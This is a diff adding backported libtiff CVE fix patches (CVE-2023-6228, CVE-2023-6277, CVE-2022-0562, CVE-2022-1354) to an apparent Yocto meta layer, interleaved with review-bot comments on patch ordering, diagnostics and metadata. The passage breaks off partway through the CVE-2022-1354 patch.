--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-6228.patch
@@ -0,0 +1,30 @@
+From 1e7d217a323eac701b134afc4ae39b6bdfdbc96a Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Sat, 9 Sep 2023 15:45:47 +0200
+Subject: [PATCH] Check also if codec of input image is available,
+ independently from codec check of output image and return with error if not.
+ Fixes #606.
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/1e7d217a323eac701b134afc4ae39b6bdfdbc96a]
+CVE: CVE-2023-6228
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ tools/tiffcp.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/tools/tiffcp.c b/tools/tiffcp.c
+index 007bd05..d2f7b66 100644
+--- a/tools/tiffcp.c
++++ b/tools/tiffcp.c
+@@ -628,6 +628,8 @@ tiffcp(TIFF* in, TIFF* out)
+ else
+ CopyField(TIFFTAG_COMPRESSION, compression);
+ TIFFGetFieldDefaulted(in, TIFFTAG_COMPRESSION, &input_compression);
++ if (!TIFFIsCODECConfigured(input_compression))
++ return FALSE;
+ TIFFGetFieldDefaulted(in, TIFFTAG_PHOTOMETRIC, &input_photometric);
+ if (input_compression == COMPRESSION_JPEG) {
+ /* Force conversion to RGB */
+--
+2.25.1
+
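Review bot: The new `if (!TIFFIsCODECConfigured(input_compression)) return FALSE;` fails without a diagnostic, so a tiffcp user presumably sees only a failure status with no hint that the input file's codec is not built in. A message before the return, for example `TIFFError(TIFFFileName(in), "Input compression codec is not configured");`, would match the TIFFError style visible in CVE-2023-40745.patch for the same file. The base blob of this patch (007bd05) is the result blob of CVE-2023-40745.patch, so the two need to stay in that order in the recipe's SRC_URI. tiffcp() continues outside the hunk, so whether any cleanup is needed before the early return cannot be judged from here.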
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-1.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-1.patch
new file mode 100644
index 0000000000..e955b3f2e4
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-1.patch
@@ -0,0 +1,191 @@
+[Ubuntu note: Backport of the following patch from upstream, with a few changes
+to match the current version of the file in the present Ubuntu release:
+ . included inttypes.h header to support PRIu32 and PRIu64;
+ . using TIFFWarningExt instead of TIFFWarningExtR (the latter did not exist yet);
+ . using uint64 instead of uint64_t to preserve the current code usage;
+ . calling _TIFFfree(data) instead of _TIFFfreeExt(tif, data) (the latter did not exist yet);
+ . calls to the check size, that is the idea of the patch, were added before
+ _TIFFCheckMalloc and may note match the original patch methods;
+-- Rodrigo Figueiredo Zaiden]
+
+Backport of:
+
+From 5320c9d89c054fa805d037d84c57da874470b01a Mon Sep 17 00:00:00 2001
+From: Su Laus <sulau@freenet.de>
+Date: Tue, 31 Oct 2023 15:43:29 +0000
+Subject: [PATCH] Prevent some out-of-memory attacks
+
+Some small fuzzer files fake large amounts of data and provoke out-of-memory situations. For non-compressed data content / tags, out-of-memory can be prevented by comparing with the file size.
+
+At image reading, data size of some tags / data structures (StripByteCounts, StripOffsets, StripArray, TIFF directory) is compared with file size to prevent provoked out-of-memory attacks.
+
+See issue https://gitlab.com/libtiff/libtiff/-/issues/614#note_1602683857
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2023-6277-1.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.com/libtiff/libtiff/-/commit/5320c9d89c054fa805d037d84c57da874470b01a]
+CVE: CVE-2023-6277
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ libtiff/tif_dirread.c | 92 ++++++++++++++++++++++++++++++++++++++++++-
+ 1 file changed, 90 insertions(+), 2 deletions(-)
+
+--- tiff-4.1.0+git191117.orig/libtiff/tif_dirread.c
++++ tiff-4.1.0+git191117/libtiff/tif_dirread.c
+@@ -37,6 +37,7 @@
+ #include "tiffiop.h"
+ #include <float.h>
+ #include <stdlib.h>
++#include <inttypes.h>
+
+ #define FAILED_FII ((uint32) -1)
+
+@@ -863,6 +864,21 @@ static enum TIFFReadDirEntryErr TIFFRead
+ datasize=(*count)*typesize;
+ assert((tmsize_t)datasize>0);
+
++ /* Before allocating a huge amount of memory for corrupted files, check if
++ * size of requested memory is not greater than file size.
++ */
++ uint64 filesize = TIFFGetFileSize(tif);
++ if (datasize > filesize)
++ {
++ TIFFWarningExt(tif->tif_clientdata, "ReadDirEntryArray",
++ "Requested memory size for tag %d (0x%x) %" PRIu32
++ " is greather than filesize %" PRIu64
++ ". Memory not allocated, tag not read",
++ direntry->tdir_tag, direntry->tdir_tag, datasize,
++ filesize);
++ return (TIFFReadDirEntryErrAlloc);
++ }
++
+ if( isMapped(tif) && datasize > (uint32)tif->tif_size )
+ return TIFFReadDirEntryErrIo;
+
+@@ -4534,6 +4550,20 @@ EstimateStripByteCounts(TIFF* tif, TIFFD
+ if( !_TIFFFillStrilesInternal( tif, 0 ) )
+ return -1;
+
++ /* Before allocating a huge amount of memory for corrupted files, check if
++ * size of requested memory is not greater than file size. */
++ uint64 filesize = TIFFGetFileSize(tif);
++ uint64 allocsize = (uint64)td->td_nstrips * sizeof(uint64);
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(tif->tif_clientdata, module,
++ "Requested memory size for StripByteCounts of %" PRIu64
++ " is greather than filesize %" PRIu64
++ ". Memory not allocated",
++ allocsize, filesize);
++ return -1;
++ }
++
+ if (td->td_stripbytecount_p)
+ _TIFFfree(td->td_stripbytecount_p);
+ td->td_stripbytecount_p = (uint64*)
+@@ -4544,9 +4574,7 @@ EstimateStripByteCounts(TIFF* tif, TIFFD
+
+ if (td->td_compression != COMPRESSION_NONE) {
+ uint64 space;
+- uint64 filesize;
+ uint16 n;
+- filesize = TIFFGetFileSize(tif);
+ if (!(tif->tif_flags&TIFF_BIGTIFF))
+ space=sizeof(TIFFHeaderClassic)+2+dircount*12+4;
+ else
+@@ -4854,6 +4882,20 @@ TIFFFetchDirectory(TIFF* tif, uint64 dir
+ dircount16 = (uint16)dircount64;
+ dirsize = 20;
+ }
++ /* Before allocating a huge amount of memory for corrupted files, check
++ * if size of requested memory is not greater than file size. */
++ uint64 filesize = TIFFGetFileSize(tif);
++ uint64 allocsize = (uint64)dircount16 * dirsize;
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(
++ tif->tif_clientdata, module,
++ "Requested memory size for TIFF directory of %" PRIu64
++ " is greather than filesize %" PRIu64
++ ". Memory not allocated, TIFF directory not read",
++ allocsize, filesize);
++ return 0;
++ }
+ origdir = _TIFFCheckMalloc(tif, dircount16,
+ dirsize, "to read TIFF directory");
+ if (origdir == NULL)
+@@ -4957,6 +4999,20 @@ TIFFFetchDirectory(TIFF* tif, uint64 dir
+ "Sanity check on directory count failed, zero tag directories not supported");
+ return 0;
+ }
++ /* Before allocating a huge amount of memory for corrupted files, check
++ * if size of requested memory is not greater than file size. */
++ uint64 filesize = TIFFGetFileSize(tif);
++ uint64 allocsize = (uint64)dircount16 * dirsize;
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(
++ tif->tif_clientdata, module,
++ "Requested memory size for TIFF directory of %" PRIu64
++ " is greather than filesize %" PRIu64
++ ". Memory not allocated, TIFF directory not read",
++ allocsize, filesize);
++ return 0;
++ }
+ origdir = _TIFFCheckMalloc(tif, dircount16,
+ dirsize,
+ "to read TIFF directory");
+@@ -5000,6 +5056,8 @@ TIFFFetchDirectory(TIFF* tif, uint64 dir
+ }
+ }
+ }
++ /* No check against filesize needed here because "dir" should have same size
++ * than "origdir" checked above. */
+ dir = (TIFFDirEntry*)_TIFFCheckMalloc(tif, dircount16,
+ sizeof(TIFFDirEntry),
+ "to read TIFF directory");
+@@ -5769,7 +5827,20 @@ TIFFFetchStripThing(TIFF* tif, TIFFDirEn
+ _TIFFfree(data);
+ return(0);
+ }
+-
++ /* Before allocating a huge amount of memory for corrupted files, check
++ * if size of requested memory is not greater than file size. */
++ uint64 filesize = TIFFGetFileSize(tif);
++ uint64 allocsize = (uint64)nstrips * sizeof(uint64);
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(tif->tif_clientdata, module,
++ "Requested memory size for StripArray of %" PRIu64
++ " is greather than filesize %" PRIu64
++ ". Memory not allocated",
++ allocsize, filesize);
++ _TIFFfree(data);
++ return (0);
++ }
+ resizeddata=(uint64*)_TIFFCheckMalloc(tif,nstrips,sizeof(uint64),"for strip array");
+ if (resizeddata==0) {
+ _TIFFfree(data);
+@@ -5865,6 +5936,23 @@ static void allocChoppedUpStripArrays(TI
+ }
+ bytecount = last_offset + last_bytecount - offset;
+
++ /* Before allocating a huge amount of memory for corrupted files, check if
++ * size of StripByteCount and StripOffset tags is not greater than
++ * file size.
++ */
++ uint64 allocsize = (uint64)nstrips * sizeof(uint64) * 2;
++ uint64 filesize = TIFFGetFileSize(tif);
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(tif->tif_clientdata, "allocChoppedUpStripArrays",
++ "Requested memory size for StripByteCount and "
++ "StripOffsets %" PRIu64
++ " is greather than filesize %" PRIu64
++ ". Memory not allocated",
++ allocsize, filesize);
++ return;
++ }
++
+ newcounts = (uint64*) _TIFFCheckMalloc(tif, nstrips, sizeof (uint64),
+ "for chopped \"StripByteCounts\" array");
+ newoffsets = (uint64*) _TIFFCheckMalloc(tif, nstrips, sizeof (uint64),
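Review bot: Of the two checks this patch adds to TIFFFetchDirectory(), only the first (hunk at -4854) is revisited later in the series: CVE-2023-6277-2.patch gates it behind a 100 MiB threshold and CVE-2023-6277-3.patch removes it, while the second (hunk at -4957) is not touched by any hunk of -2, -3 or -4 shown on this page. If that reading is right, the applied result still calls TIFFGetFileSize() unconditionally there and keeps the "greather" spelling in its warning, although the rationale given in -3 (dircount16 * dirsize is too small to need a check) would seem to apply to it as well. It is worth comparing the patched result with upstream's tif_dirread.c. The header should also record that -1 must not be applied without -2 to -4, since -2 describes the unconditional TIFFGetFileSize() calls as a performance regression.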
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-2.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-2.patch
new file mode 100644
index 0000000000..644b3fdb3f
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-2.patch
@@ -0,0 +1,152 @@
+[Ubuntu note: Backport of the following patch from upstream, with a few changes
+to match the current version of the file in the present Ubuntu release:
+ . using TIFFWarningExt instead of TIFFWarningExtR (the latter did not exist yet);
+ . using uint64 instead of uint64_t to preserve the current code usage;
+-- Rodrigo Figueiredo Zaiden]
+
+Backport of:
+
+From 0b025324711213a75e38b52f7e7ba60235f108aa Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Tue, 31 Oct 2023 19:47:22 +0100
+Subject: [PATCH] tif_dirread.c: only issue TIFFGetFileSize() for large enough
+ RAM requests
+
+Ammends 5320c9d89c054fa805d037d84c57da874470b01a
+
+This fixes a performance regression caught by the GDAL regression test
+suite.
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2023-6277-2.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.com/libtiff/libtiff/-/commit/0b025324711213a75e38b52f7e7ba60235f108aa]
+CVE: CVE-2023-6277
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ libtiff/tif_dirread.c | 83 +++++++++++++++++++++++++------------------
+ 1 file changed, 48 insertions(+), 35 deletions(-)
+
+--- tiff-4.1.0+git191117.orig/libtiff/tif_dirread.c
++++ tiff-4.1.0+git191117/libtiff/tif_dirread.c
+@@ -864,19 +864,22 @@ static enum TIFFReadDirEntryErr TIFFRead
+ datasize=(*count)*typesize;
+ assert((tmsize_t)datasize>0);
+
+- /* Before allocating a huge amount of memory for corrupted files, check if
+- * size of requested memory is not greater than file size.
+- */
+- uint64 filesize = TIFFGetFileSize(tif);
+- if (datasize > filesize)
++ if (datasize > 100 * 1024 * 1024)
+ {
+- TIFFWarningExt(tif->tif_clientdata, "ReadDirEntryArray",
+- "Requested memory size for tag %d (0x%x) %" PRIu32
+- " is greather than filesize %" PRIu64
+- ". Memory not allocated, tag not read",
+- direntry->tdir_tag, direntry->tdir_tag, datasize,
+- filesize);
+- return (TIFFReadDirEntryErrAlloc);
++ /* Before allocating a huge amount of memory for corrupted files, check
++ * if size of requested memory is not greater than file size.
++ */
++ const uint64 filesize = TIFFGetFileSize(tif);
++ if (datasize > filesize)
++ {
++ TIFFWarningExt(tif->tif_clientdata, "ReadDirEntryArray",
++ "Requested memory size for tag %d (0x%x) %" PRIu32
++ " is greater than filesize %" PRIu64
++ ". Memory not allocated, tag not read",
++ direntry->tdir_tag, direntry->tdir_tag, datasize,
++ filesize);
++ return (TIFFReadDirEntryErrAlloc);
++ }
+ }
+
+ if( isMapped(tif) && datasize > (uint32)tif->tif_size )
+@@ -4550,18 +4553,22 @@ EstimateStripByteCounts(TIFF* tif, TIFFD
+ if( !_TIFFFillStrilesInternal( tif, 0 ) )
+ return -1;
+
+- /* Before allocating a huge amount of memory for corrupted files, check if
+- * size of requested memory is not greater than file size. */
+- uint64 filesize = TIFFGetFileSize(tif);
+- uint64 allocsize = (uint64)td->td_nstrips * sizeof(uint64);
+- if (allocsize > filesize)
++ const uint64 allocsize = (uint64)td->td_nstrips * sizeof(uint64);
++ uint64 filesize = 0;
++ if (allocsize > 100 * 1024 * 1024)
+ {
+- TIFFWarningExt(tif->tif_clientdata, module,
+- "Requested memory size for StripByteCounts of %" PRIu64
+- " is greather than filesize %" PRIu64
+- ". Memory not allocated",
+- allocsize, filesize);
+- return -1;
++ /* Before allocating a huge amount of memory for corrupted files, check
++ * if size of requested memory is not greater than file size. */
++ filesize = TIFFGetFileSize(tif);
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(
++ tif->tif_clientdata, module,
++ "Requested memory size for StripByteCounts of %" PRIu64
++ " is greater than filesize %" PRIu64 ". Memory not allocated",
++ allocsize, filesize);
++ return -1;
++ }
+ }
+
+ if (td->td_stripbytecount_p)
+@@ -4608,11 +4615,13 @@ EstimateStripByteCounts(TIFF* tif, TIFFD
+ return -1;
+ space+=datasize;
+ }
++ if (filesize == 0)
++ filesize = TIFFGetFileSize(tif);
+ if( filesize < space )
+- /* we should perhaps return in error ? */
+- space = filesize;
+- else
+- space = filesize - space;
++ /* we should perhaps return in error ? */
++ space = filesize;
++ else
++ space = filesize - space;
+ if (td->td_planarconfig == PLANARCONFIG_SEPARATE)
+ space /= td->td_samplesperpixel;
+ for (strip = 0; strip < td->td_nstrips; strip++)
+@@ -4882,19 +4891,23 @@ TIFFFetchDirectory(TIFF* tif, uint64 dir
+ dircount16 = (uint16)dircount64;
+ dirsize = 20;
+ }
+- /* Before allocating a huge amount of memory for corrupted files, check
+- * if size of requested memory is not greater than file size. */
+- uint64 filesize = TIFFGetFileSize(tif);
+- uint64 allocsize = (uint64)dircount16 * dirsize;
+- if (allocsize > filesize)
++ const uint64 allocsize = (uint64)dircount16 * dirsize;
++ if (allocsize > 100 * 1024 * 1024)
+ {
+- TIFFWarningExt(
+- tif->tif_clientdata, module,
+- "Requested memory size for TIFF directory of %" PRIu64
+- " is greather than filesize %" PRIu64
+- ". Memory not allocated, TIFF directory not read",
+- allocsize, filesize);
+- return 0;
++ /* Before allocating a huge amount of memory for corrupted files,
++ * check if size of requested memory is not greater than file size.
++ */
++ const uint64 filesize = TIFFGetFileSize(tif);
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(
++ tif->tif_clientdata, module,
++ "Requested memory size for TIFF directory of %" PRIu64
++ " is greater than filesize %" PRIu64
++ ". Memory not allocated, TIFF directory not read",
++ allocsize, filesize);
++ return 0;
++ }
+ }
+ origdir = _TIFFCheckMalloc(tif, dircount16,
+ dirsize, "to read TIFF directory");
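Review bot: With the new `> 100 * 1024 * 1024` gate, requests below 100 MiB are no longer compared with the file size at these sites, so as far as these hunks show a small crafted file can still trigger allocation attempts up to that size; CVE-2023-6277-4.patch uses the same threshold. That is upstream's trade-off for the GDAL performance regression named in the description, but for memory-constrained targets it deserves a sentence in the patch header so integrators do not read CVE-2023-6277 as bounding every allocation by file size. In EstimateStripByteCounts(), `filesize = 0` now doubles as "not queried yet"; a comment such as `/* 0 = file size not fetched yet */` on the declaration would make the later `if (filesize == 0)` refetch self-explanatory.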
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-3.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-3.patch
new file mode 100644
index 0000000000..ed7d7e7b96
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-3.patch
@@ -0,0 +1,46 @@
+Backport of:
+
+From de7bfd7d4377c266f81849579f696fa1ad5ba6c3 Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Tue, 31 Oct 2023 20:13:45 +0100
+Subject: [PATCH] TIFFFetchDirectory(): remove useless allocsize vs filesize
+ check
+
+CoverityScan rightly points that the max value for dircount16 * dirsize
+is 4096 * 20. That's small enough not to do any check
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2023-6277-3.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.com/libtiff/libtiff/-/commit/de7bfd7d4377c266f81849579f696fa1ad5ba6c3]
+CVE: CVE-2023-6277
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ libtiff/tif_dirread.c | 18 ------------------
+ 1 file changed, 18 deletions(-)
+
+--- tiff-4.1.0+git191117.orig/libtiff/tif_dirread.c
++++ tiff-4.1.0+git191117/libtiff/tif_dirread.c
+@@ -4891,24 +4891,6 @@ TIFFFetchDirectory(TIFF* tif, uint64 dir
+ dircount16 = (uint16)dircount64;
+ dirsize = 20;
+ }
+- const uint64 allocsize = (uint64)dircount16 * dirsize;
+- if (allocsize > 100 * 1024 * 1024)
+- {
+- /* Before allocating a huge amount of memory for corrupted files,
+- * check if size of requested memory is not greater than file size.
+- */
+- const uint64 filesize = TIFFGetFileSize(tif);
+- if (allocsize > filesize)
+- {
+- TIFFWarningExt(
+- tif->tif_clientdata, module,
+- "Requested memory size for TIFF directory of %" PRIu64
+- " is greater than filesize %" PRIu64
+- ". Memory not allocated, TIFF directory not read",
+- allocsize, filesize);
+- return 0;
+- }
+- }
+ origdir = _TIFFCheckMalloc(tif, dircount16,
+ dirsize, "to read TIFF directory");
+ if (origdir == NULL)
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-4.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-4.patch
new file mode 100644
index 0000000000..1a43fd3230
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-4.patch
@@ -0,0 +1,94 @@
+[Ubuntu note: Backport of the following patch from upstream, with a few changes
+to match the current version of the file in the present Ubuntu release:
+ . using TIFFWarningExt instead of TIFFWarningExtR (the latter did not exist yet);
+ . using uint64 instead of uint64_t to preserve the current code usage;
+ . calling _TIFFfree(data) instead of _TIFFfreeExt(tif, data) (the latter did not exist yet);
+-- Rodrigo Figueiredo Zaiden]
+
+Backport of:
+
+From dbb825a8312f30e63a06c272010967d51af5c35a Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Tue, 31 Oct 2023 21:30:58 +0100
+Subject: [PATCH] tif_dirread.c: only issue TIFFGetFileSize() for large enough
+ RAM requests
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2023-6277-4.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.com/libtiff/libtiff/-/commit/dbb825a8312f30e63a06c272010967d51af5c35a]
+CVE: CVE-2023-6277
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ libtiff/tif_dirread.c | 54 +++++++++++++++++++++++++------------------
+ 1 file changed, 31 insertions(+), 23 deletions(-)
+
+--- tiff-4.1.0+git191117.orig/libtiff/tif_dirread.c
++++ tiff-4.1.0+git191117/libtiff/tif_dirread.c
+@@ -5822,19 +5822,24 @@ TIFFFetchStripThing(TIFF* tif, TIFFDirEn
+ _TIFFfree(data);
+ return(0);
+ }
+- /* Before allocating a huge amount of memory for corrupted files, check
+- * if size of requested memory is not greater than file size. */
+- uint64 filesize = TIFFGetFileSize(tif);
+- uint64 allocsize = (uint64)nstrips * sizeof(uint64);
+- if (allocsize > filesize)
++ const uint64 allocsize = (uint64)nstrips * sizeof(uint64);
++ if (allocsize > 100 * 1024 * 1024)
+ {
+- TIFFWarningExt(tif->tif_clientdata, module,
+- "Requested memory size for StripArray of %" PRIu64
+- " is greather than filesize %" PRIu64
+- ". Memory not allocated",
+- allocsize, filesize);
+- _TIFFfree(data);
+- return (0);
++ /* Before allocating a huge amount of memory for corrupted files,
++ * check if size of requested memory is not greater than file size.
++ */
++ const uint64 filesize = TIFFGetFileSize(tif);
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(
++ tif->tif_clientdata, module,
++ "Requested memory size for StripArray of %" PRIu64
++ " is greater than filesize %" PRIu64
++ ". Memory not allocated",
++ allocsize, filesize);
++ _TIFFfree(data);
++ return (0);
++ }
+ }
+ resizeddata=(uint64*)_TIFFCheckMalloc(tif,nstrips,sizeof(uint64),"for strip array");
+ if (resizeddata==0) {
+@@ -5935,17 +5940,20 @@ static void allocChoppedUpStripArrays(TI
+ * size of StripByteCount and StripOffset tags is not greater than
+ * file size.
+ */
+- uint64 allocsize = (uint64)nstrips * sizeof(uint64) * 2;
+- uint64 filesize = TIFFGetFileSize(tif);
+- if (allocsize > filesize)
+- {
+- TIFFWarningExt(tif->tif_clientdata, "allocChoppedUpStripArrays",
+- "Requested memory size for StripByteCount and "
+- "StripOffsets %" PRIu64
+- " is greather than filesize %" PRIu64
+- ". Memory not allocated",
+- allocsize, filesize);
+- return;
++ const uint64 allocsize = (uint64)nstrips * sizeof(uint64) * 2;
++ if (allocsize > 100 * 1024 * 1024)
++ {
++ const uint64 filesize = TIFFGetFileSize(tif);
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(tif->tif_clientdata, "allocChoppedUpStripArrays",
++ "Requested memory size for StripByteCount and "
++ "StripOffsets %" PRIu64
++ " is greater than filesize %" PRIu64
++ ". Memory not allocated",
++ allocsize, filesize);
++ return;
++ }
+ }
+
+ newcounts = (uint64*) _TIFFCheckMalloc(tif, nstrips, sizeof (uint64),
diff --git a/meta/recipes-multimedia/libtiff/tiff/561599c99f987dc32ae110370cfdd7df7975586b.patch b/meta/recipes-multimedia/libtiff/tiff/561599c99f987dc32ae110370cfdd7df7975586b.patch
new file mode 100644
index 0000000000..01ed5dcd24
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/tiff/561599c99f987dc32ae110370cfdd7df7975586b.patch
@@ -0,0 +1,28 @@
+From 561599c99f987dc32ae110370cfdd7df7975586b Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Sat, 5 Feb 2022 20:36:41 +0100
+Subject: [PATCH] TIFFReadDirectory(): avoid calling memcpy() with a null
+ source pointer and size of zero (fixes #362)
+
+Upstream-Status: Backport
+CVE: CVE-2022-0562
+Signed-off-by: Sana Kazi <Sana.Kazi@kpit.com>
+Comment: Refreshed patch
+---
+ libtiff/tif_dirread.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/libtiff/tif_dirread.c b/libtiff/tif_dirread.c
+index 2bbc4585..23194ced 100644
+--- a/libtiff/tif_dirread.c
++++ b/libtiff/tif_dirread.c
+@@ -4126,7 +4126,8 @@
+ goto bad;
+ }
+
+- memcpy(new_sampleinfo, tif->tif_dir.td_sampleinfo, old_extrasamples * sizeof(uint16));
++ if (old_extrasamples > 0)
++ memcpy(new_sampleinfo, tif->tif_dir.td_sampleinfo, old_extrasamples * sizeof(uint16));
+ _TIFFsetShortArray(&tif->tif_dir.td_sampleinfo, new_sampleinfo, tif->tif_dir.td_extrasamples);
+ _TIFFfree(new_sampleinfo);
+ }
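Review bot: `Upstream-Status: Backport` carries no reference here, unlike the other libtiff patches in this commit, and the file is named after a commit hash although its header says `CVE: CVE-2022-0562`. If the `From` hash is the upstream commit, I would write `Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/561599c99f987dc32ae110370cfdd7df7975586b]` so the fix can be checked against its source. The inner hunk header `@@ -4126,7 +4126,8 @@` has lost its function context in the refresh, so the subject line is the only place that names TIFFReadDirectory(). Saying in the `Comment:` line what the refresh changed would help the next rebase.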
diff --git a/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1354.patch b/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1354.patch
new file mode 100644
index 0000000000..71b85cac10
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/tiff/CVE-2022-1354.patch
@@ -0,0 +1,212 @@
+From 87881e093691a35c60b91cafed058ba2dd5d9807 Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Sun, 5 Dec 2021 14:37:46 +0100
+Subject: [PATCH] TIFFReadDirectory: fix OJPEG hack (fixes #319)
+
+to avoid having the size of the strip arrays inconsistent with the
+number of strips returned by TIFFNumberOfStrips(), which may cause
+out-ouf-bounds array read afterwards.
+
+One of the OJPEG hack that alters SamplesPerPixel may influence the
+number of strips. Hence compute tif_dir.td_nstrips only afterwards.
+
+CVE: CVE-2022-1354
+
+Upstream-Status: Backport
+[https://gitlab.com/libtiff/libtiff/-/commit/87f580f39011109b3bb5f6eca13fac543a542798]
+
+Signed-off-by: Yi Zhao <yi.zhao@windriver.com>
+---
+ libtiff/tif_dirread.c | 162 ++++++++++++++++++++++--------------------
+ 1 file changed, 83 insertions(+), 79 deletions(-)
+
+diff --git a/libtiff/tif_dirread.c b/libtiff/tif_dirread.c
+index 8f434ef5..14c031d1 100644
+--- a/libtiff/tif_dirread.c
++++ b/libtiff/tif_dirread.c
+@@ -3794,50 +3794,7 @@ TIFFReadDirectory(TIFF* tif)
+ MissingRequired(tif,"ImageLength");
+ goto bad;
+ }
+- /*
+- * Setup appropriate structures (by strip or by tile)
+- */
+- if (!TIFFFieldSet(tif, FIELD_TILEDIMENSIONS)) {
+- tif->tif_dir.td_nstrips = TIFFNumberOfStrips(tif);
+- tif->tif_dir.td_tilewidth = tif->tif_dir.td_imagewidth;
+- tif->tif_dir.td_tilelength = tif->tif_dir.td_rowsperstrip;
+- tif->tif_dir.td_tiledepth = tif->tif_dir.td_imagedepth;
+- tif->tif_flags &= ~TIFF_ISTILED;
+- } else {
+- tif->tif_dir.td_nstrips = TIFFNumberOfTiles(tif);
+- tif->tif_flags |= TIFF_ISTILED;
+- }
+- if (!tif->tif_dir.td_nstrips) {
+- TIFFErrorExt(tif->tif_clientdata, module,
+- "Cannot handle zero number of %s",
+- isTiled(tif) ? "tiles" : "strips");
+- goto bad;
+- }
+- tif->tif_dir.td_stripsperimage = tif->tif_dir.td_nstrips;
+- if (tif->tif_dir.td_planarconfig == PLANARCONFIG_SEPARATE)
+- tif->tif_dir.td_stripsperimage /= tif->tif_dir.td_samplesperpixel;
+- if (!TIFFFieldSet(tif, FIELD_STRIPOFFSETS)) {
+-#ifdef OJPEG_SUPPORT
+- if ((tif->tif_dir.td_compression==COMPRESSION_OJPEG) &&
+- (isTiled(tif)==0) &&
+- (tif->tif_dir.td_nstrips==1)) {
+- /*
+- * XXX: OJPEG hack.
+- * If a) compression is OJPEG, b) it's not a tiled TIFF,
+- * and c) the number of strips is 1,
+- * then we tolerate the absence of stripoffsets tag,
+- * because, presumably, all required data is in the
+- * JpegInterchangeFormat stream.
+- */
+- TIFFSetFieldBit(tif, FIELD_STRIPOFFSETS);
+- } else
+-#endif
+- {
+- MissingRequired(tif,
+- isTiled(tif) ? "TileOffsets" : "StripOffsets");
+- goto bad;
+- }
+- }
++
+ /*
+ * Second pass: extract other information.
+ */
+@@ -4042,41 +3999,6 @@ TIFFReadDirectory(TIFF* tif)
+ } /* -- if (!dp->tdir_ignore) */
+ } /* -- for-loop -- */
+
+- if( tif->tif_mode == O_RDWR &&
+- tif->tif_dir.td_stripoffset_entry.tdir_tag != 0 &&
+- tif->tif_dir.td_stripoffset_entry.tdir_count == 0 &&
+- tif->tif_dir.td_stripoffset_entry.tdir_type == 0 &&
+- tif->tif_dir.td_stripoffset_entry.tdir_offset.toff_long8 == 0 &&
+- tif->tif_dir.td_stripbytecount_entry.tdir_tag != 0 &&
+- tif->tif_dir.td_stripbytecount_entry.tdir_count == 0 &&
+- tif->tif_dir.td_stripbytecount_entry.tdir_type == 0 &&
+- tif->tif_dir.td_stripbytecount_entry.tdir_offset.toff_long8 == 0 )
+- {
+- /* Directory typically created with TIFFDeferStrileArrayWriting() */
+- TIFFSetupStrips(tif);
+- }
+- else if( !(tif->tif_flags&TIFF_DEFERSTRILELOAD) )
+- {
+- if( tif->tif_dir.td_stripoffset_entry.tdir_tag != 0 )
+- {
+- if (!TIFFFetchStripThing(tif,&(tif->tif_dir.td_stripoffset_entry),
+- tif->tif_dir.td_nstrips,
+- &tif->tif_dir.td_stripoffset_p))
+- {
+- goto bad;
+- }
+- }
+- if( tif->tif_dir.td_stripbytecount_entry.tdir_tag != 0 )
+- {
+- if (!TIFFFetchStripThing(tif,&(tif->tif_dir.td_stripbytecount_entry),
+- tif->tif_dir.td_nstrips,
+- &tif->tif_dir.td_stripbytecount_p))
+- {
+- goto bad;
+- }
+- }
+- }
+-
+ /*
+ * OJPEG hack:
